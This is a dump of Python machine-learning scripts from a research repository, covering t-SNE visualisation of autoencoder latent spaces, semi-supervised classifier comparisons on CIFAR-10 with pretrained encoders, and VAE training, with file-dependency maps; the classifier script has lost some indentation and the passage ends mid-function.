"/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,502 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_tsne.py | import os
import sys
import h5py
#import cv2
import math
import random, string
from matplotlib.pyplot import cm
import numpy as np
from scipy.stats import norm
from sklearn import manifold
import matplotlib.pyplot as plt
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.ticker import NullFormatter
from mnist_conv_ae_models import encoder_model
def loadDataset():
    """Return MNIST train/test splits as NHWC float arrays scaled to [0, 1]."""
    from keras.datasets import mnist

    def _prep(images):
        # reshape to (n, 28, 28, 1) and normalise 8-bit pixels to [0, 1]
        return images.reshape([-1, 28, 28, 1]) / 255.

    (X_train, y_train), (X_test, y_test) = mnist.load_data()
    return (_prep(X_train), y_train), (_prep(X_test), y_test)
# Scatter with images instead of points
def imscatter(x, y, ax, imageData, zoom):
    """Scatter-plot thumbnails: draw imageData[i] at (x[i], y[i]) on ax.

    x, y -- coordinate sequences of equal length
    ax -- matplotlib Axes to draw on
    imageData -- images with pixel values in [0, 1]; each entry must reshape
                 to (imageSize, imageSize) — reads the module-level imageSize
    zoom -- thumbnail scale factor
    """
    for i in range(len(x)):
        x0, y0 = x[i], y[i]
        # Rescale [0, 1] floats to 8-bit greyscale for display
        img = imageData[i] * 255.
        img = img.astype(np.uint8).reshape([imageSize, imageSize])
        #img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
        # Note: OpenCV uses BGR and plt uses RGB
        image = OffsetImage(img, zoom=zoom)
        ab = AnnotationBbox(image, (x0, y0), xycoords='data', frameon=False)
        # (the previously-accumulated `images` list of artists was never used)
        ax.add_artist(ab)
    # Ensure autoscaling accounts for the annotation positions
    ax.update_datalim(np.column_stack([x, y]))
    ax.autoscale()
# Show dataset images with T-sne projection of latent space encoding
def computeTSNEProjectionOfLatentSpace(X, encoder, display=True):
    """Embed the encoder's latent codes for X with t-SNE and optionally plot.

    X -- input images accepted by encoder.predict
    encoder -- model mapping images to latent vectors
    display -- if True, also show the embedding as an image scatter plot
    Returns the t-SNE embedding in every case (previously None when
    display=True, which callers ignored — backward compatible).
    """
    # Compute latent space representation
    print("Computing latent space projection...")
    X_encoded = encoder.predict(X)

    # Compute t-SNE embedding of latent space
    # NOTE(review): n_components=3 although only the first two axes are
    # plotted below; n_components=2 would be cheaper — confirm intent.
    print("Computing t-SNE embedding...")
    tsne = manifold.TSNE(n_components=3, init='pca', random_state=0)
    X_tsne = tsne.fit_transform(X_encoded)

    # Plot images according to t-sne embedding
    if display:
        print("Plotting t-SNE visualization...")
        fig, ax = plt.subplots()
        imscatter(X_tsne[:, 0], X_tsne[:, 1], imageData=X, ax=ax, zoom=0.6)
        plt.show()
    return X_tsne
# Show dataset images with T-sne projection of pixel space
def computeTSNEProjectionOfPixelSpace(X, display=True):
    """Embed the raw pixels of X with t-SNE and optionally plot.

    X -- images; flattened internally to imageSize * imageSize vectors
         (reads the module-level imageSize; single channel assumed)
    display -- if True, also show the embedding as an image scatter plot
    Returns the t-SNE embedding in every case (previously None when
    display=True, which callers ignored — backward compatible).
    """
    # Compute t-SNE embedding of pixel space
    # NOTE(review): n_components=3 although only two axes are plotted below.
    print("Computing t-SNE embedding...")
    tsne = manifold.TSNE(n_components=3, init='pca', random_state=0)
    X_tsne = tsne.fit_transform(X.reshape([-1, imageSize * imageSize * 1]))

    # Plot images according to t-sne embedding
    if display:
        print("Plotting t-SNE visualization...")
        fig, ax = plt.subplots()
        imscatter(X_tsne[:, 0], X_tsne[:, 1], imageData=X, ax=ax, zoom=0.6)
        plt.show()
    return X_tsne
## Run visualizations
# Side length of the square, single-channel MNIST images; read as a global
# by imscatter and computeTSNEProjectionOfPixelSpace above.
imageSize = 28
# Load dataset to test
print("Loading dataset...")
(X_train, y_train), (X_test, y_test) = loadDataset()
# Restore the pre-trained convolutional-autoencoder encoder from disk
encoder = encoder_model()
encoder.load_weights('mnist_conv_ae_encoder.h5')
# Visualise the test set twice: encoder latent space vs raw pixel space
computeTSNEProjectionOfLatentSpace(X_test, encoder)
computeTSNEProjectionOfPixelSpace(X_test)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,503 | davidhayes3/ME-Project | refs/heads/master | /semi_supervised/bigan/cifar10_bigan_comparison.py | import keras
from keras import backend as K
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from common_models.classifier_models import classifier_e_frozen_model, classifier_e_trainable_model
from semi_supervised_comparison.cifar10_cnn.cifar10_models import deterministic_encoder_model
from functions.data_funcs import get_cifar10
from keras.callbacks import EarlyStopping, ModelCheckpoint
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
# Number of labelled examples to investigate
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]
num_iterations = 5
# Path that containes pre-trained encoder
pretrained_encoder_path = 'cifar10_bigan_determ_encoder.h5'
# Paths to hold classifier models
classifier_pretrained_frozen_path = 'cifar10_pretrained_frozen_classifier.h5'
classifier_pretrained_trainable_path = 'cifar10_pretrained_trainable.h5'
classifier_random_path = 'cifar10_random.h5'
# =====================================
# Load data
# =====================================
(x_train, y_train), (x_test, y_test) = get_cifar10()
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)
# =====================================
# Instantiate models
# =====================================
# Load frozen pretrained encoder model
pretrained_e_frozen = deterministic_encoder_model()
pretrained_e_frozen.load_weights(pretrained_encoder_path)
pretrained_e_frozen.trainable = False
# =====================================
# Training details
# =====================================
# Hyper-parameters and training specification for both models
epochs = 200
batch_size = 128
val_split = 1/5.
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
# Arrays to hold accuracy of classifiers
classifier_pretrained_frozen_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_trainable_acc = np.zeros(len(num_unlabelled))
classifier_random_acc = np.zeros(len(num_unlabelled))
# =====================================
# Train models
# =====================================
# Loop through each quantity of enquiry
for index, num in enumerate(num_unlabelled):
# Set each score to zero
pretrained_frozen_score = 0
pretrained_trainable_score = 0
random_score = 0
# Reduce size of training sets
reduced_x_train = x_train[0:num, :, :, :]
reduced_y_train = y_train_one_hot[0:num, :]
# Average classification accuracy a number of random initializations
for iteration in range(num_iterations):
# Print details of no. of labelled examples and iteration number
print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(iteration+1) + '/' + str(num_iterations))
# ----------------------------
# Instantiate classifiers
# ----------------------------
# Classifier with e learned from autoencoder and frozen
mnist_classifier_pretrained_e_frozen = classifier_e_frozen_model(pretrained_e_frozen)
# Classifier with e learned from autoencoder and not frozen
pretrained_e_trainable = deterministic_encoder_model()
pretrained_e_trainable.load_weights(pretrained_encoder_path)
mnist_classifier_pretrained_e_trainable = classifier_e_trainable_model(pretrained_e_trainable)
# Classifier with randomly initialized e
random_e = deterministic_encoder_model()
mnist_classifier_random_e = classifier_e_trainable_model(random_e)
# ----------------------------
# Inspect trainable weights
# ----------------------------
# Print details of trainable and non-trainable weights of models
if index == 0 and iteration == 0:
# Print number of trainable and non-trainable parameters for each classifier
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_frozen.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_frozen.non_trainable_weights)]))
print('Classifier w/ Frozen Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
# Report parameter counts for the classifier with a trainable pretrained encoder.
trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_trainable.trainable_weights)]))
non_trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_trainable.non_trainable_weights)]))
print('\nClassifier w/ Trainable Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))  # fixed typo: was 'paramseter'
print('Non-trainable parameters: ' + str(non_trainable_count))
# Report parameter counts for the classifier with a randomly initialized encoder.
trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.trainable_weights)]))
non_trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.non_trainable_weights)]))
print('\nClassifier w/ Random Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))  # fixed typo: was 'paramseter'
print('Non-trainable parameters: ' + str(non_trainable_count))
# ----------------------------
# Compile models
# ----------------------------
mnist_classifier_pretrained_e_frozen.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
mnist_classifier_pretrained_e_trainable.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
mnist_classifier_random_e.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
# ----------------------------
# Train classifiers
# ----------------------------
# Train classifier with frozen pretrained encoder
model_checkpoint = ModelCheckpoint('classifier_1.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
mnist_classifier_pretrained_e_frozen.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
mnist_classifier_pretrained_e_frozen.load_weights('classifier_1.h5')
score = mnist_classifier_pretrained_e_frozen.evaluate(x_test, y_test_one_hot, verbose=0)
pretrained_frozen_score += score[1]
# Train classifier with trainable pretrained encoder
model_checkpoint = ModelCheckpoint('classifier_2.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
mnist_classifier_pretrained_e_trainable.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
shuffle=True,
validation_split=val_split)
mnist_classifier_pretrained_e_trainable.load_weights('classifier_2.h5')
score = mnist_classifier_pretrained_e_trainable.evaluate(x_test, y_test_one_hot, verbose=0)
pretrained_trainable_score += score[1]
# Train classifier with randomly initialized encoder
model_checkpoint = ModelCheckpoint('classifier_3.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
mnist_classifier_random_e.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
shuffle=True,
validation_split=val_split)
mnist_classifier_random_e.load_weights('classifier_3.h5')
score = mnist_classifier_random_e.evaluate(x_test, y_test_one_hot, verbose=0)
random_score += score[1]
# Record average classification accuracy for each no. of labelled examples
classifier_pretrained_frozen_acc[index] = 100 * pretrained_frozen_score / num_iterations
classifier_pretrained_trainable_acc[index] = 100 * pretrained_trainable_score / num_iterations
classifier_random_acc[index] = 100 * random_score / num_iterations
# Print final test accuracies of the three classifiers (last entry = full training set).
print('Classifier Accuracies\n')  # fixed typo: was 'Classifer'
print('Frozen Pretrained Encoder + FC Layers: ' + str(classifier_pretrained_frozen_acc[-1]) + '%')
print('Trainable Pretrained Encoder + FC Layers: ' + str(classifier_pretrained_trainable_acc[-1]) + '%')
print('Randomly Initialized Encoder + FC Layers: ' + str(classifier_random_acc[-1]) + '%')
# Save results to file
np.savetxt('classifier1.txt', classifier_pretrained_frozen_acc, fmt='%f')
np.savetxt('classifier2.txt', classifier_pretrained_trainable_acc, fmt='%f')
np.savetxt('classifier3.txt', classifier_random_acc, fmt='%f')
# =====================================
# Visualize results
# =====================================
# Plot comparison graph
plt.plot(num_unlabelled, classifier_pretrained_frozen_acc, '-o', num_unlabelled, classifier_pretrained_trainable_acc,
'-o', num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Frozen Pretrained Encoder', 'Trainable Pretrained Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.savefig('cifar10_classifier_num_labels_compar.png')
# Plot for frozen pretrained network.
# Bug fix: without plt.figure() this plot was drawn on top of the comparison
# figure above, so the saved image contained all previous curves and labels.
plt.figure()
plt.plot(num_unlabelled, classifier_pretrained_frozen_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Frozen Pretrained E)')  # fixed unbalanced '('
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.savefig('cifar10_pretrained_frozen_acc.png')
# Plot for trainable pretrained network.
# Bug fix: start a fresh figure so curves from the previous plots do not
# accumulate into this saved image.
plt.figure()
plt.plot(num_unlabelled, classifier_pretrained_trainable_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Trainable Pretrained E)')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.savefig('cifar10_pretrained_trainable_acc.png')
# Plot for fully supervised (randomly initialized encoder) network.
# Bug fix: start a fresh figure so curves from the previous plots do not
# accumulate into this saved image.
plt.figure()
plt.plot(num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Random E)')  # fixed unbalanced '('
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.savefig('cifar10_random_acc.png') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,504 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_vae_train.py | from __future__ import print_function
import numpy as np
from functions.data_funcs import get_cifar10
from functions.visualization_funcs import plot_train_loss, plot_train_accuracy, save_reconstructions
from functions.auxiliary_funcs import save_models
from cifar10_models import vae_encoder_model, generator_model
from common_models.common_models import vae_model, vae_encoder_sampling_model
from keras import backend as K
from keras import metrics
from keras.models import Model
from keras.layers import Input, Lambda
from keras.callbacks import EarlyStopping, TensorBoard, ModelCheckpoint
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
epsilon_std = 0.05
image_path = 'Images/cifar10_vae'
model_path = 'Models/cifar10_vae'
# =====================================
# Load dataset
# =====================================
(X_train, y_train), (X_test, y_test) = get_cifar10()
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate models
encoder = vae_encoder_model()
generator = generator_model()
# Define sampling function
def sampling(args):
    """Reparameterization trick for the VAE latent layer.

    Takes the (z_mean, z_log_var) tensor pair produced by the encoder and
    draws z = mean + sigma * eps, with eps ~ N(0, epsilon_std), so gradients
    can flow through the stochastic sampling step.
    """
    mu, log_var = args
    eps = K.random_normal(shape=(K.shape(mu)[0], latent_dim),
                          mean=0., stddev=epsilon_std)
    return mu + K.exp(log_var / 2) * eps
# Define VAE model
x = Input(shape=img_shape)
z_mean, z_log_var = encoder(x)
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
recon_x = generator(z)
vae = Model(x, recon_x)
# Define VAE loss and compile model
xent_loss = np.prod(img_shape) * K.mean(metrics.binary_crossentropy(x, recon_x))
kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
vae_loss = K.mean(xent_loss + kl_loss)
vae.add_loss(vae_loss)
vae.compile(optimizer='rmsprop', loss=None)
# =====================================
# Train models
# =====================================
# Specify training hyper-parameters
epochs = 100
batch_size = 128
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(filepath=model_path+'.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = vae.fit(X_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
callbacks=callbacks,
validation_split=1/10.)
# Replace current encoder and generator models with that from the saved best autoencoder
# Rebuild fresh encoder/generator networks, wire them into a new VAE with the
# same architecture, then load the best-validation-loss weights written by the
# ModelCheckpoint callback during training. Because `encoder` and `generator`
# are the sub-models of this reloaded VAE, they now carry the checkpointed weights.
vae_encoder = vae_encoder_model()
encoder = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, epsilon_std)
generator = generator_model()
vae = vae_model(encoder, generator, img_shape)
vae.load_weights(model_path + '.h5')
# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Plot training curves
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,505 | davidhayes3/ME-Project | refs/heads/master | /functions/auxiliary_funcs.py |
# Function to save models
def save_models(path, encoder=None, generator=None):
if encoder is not None:
encoder.save_weights(path + '_encoder.h5')
if generator is not None:
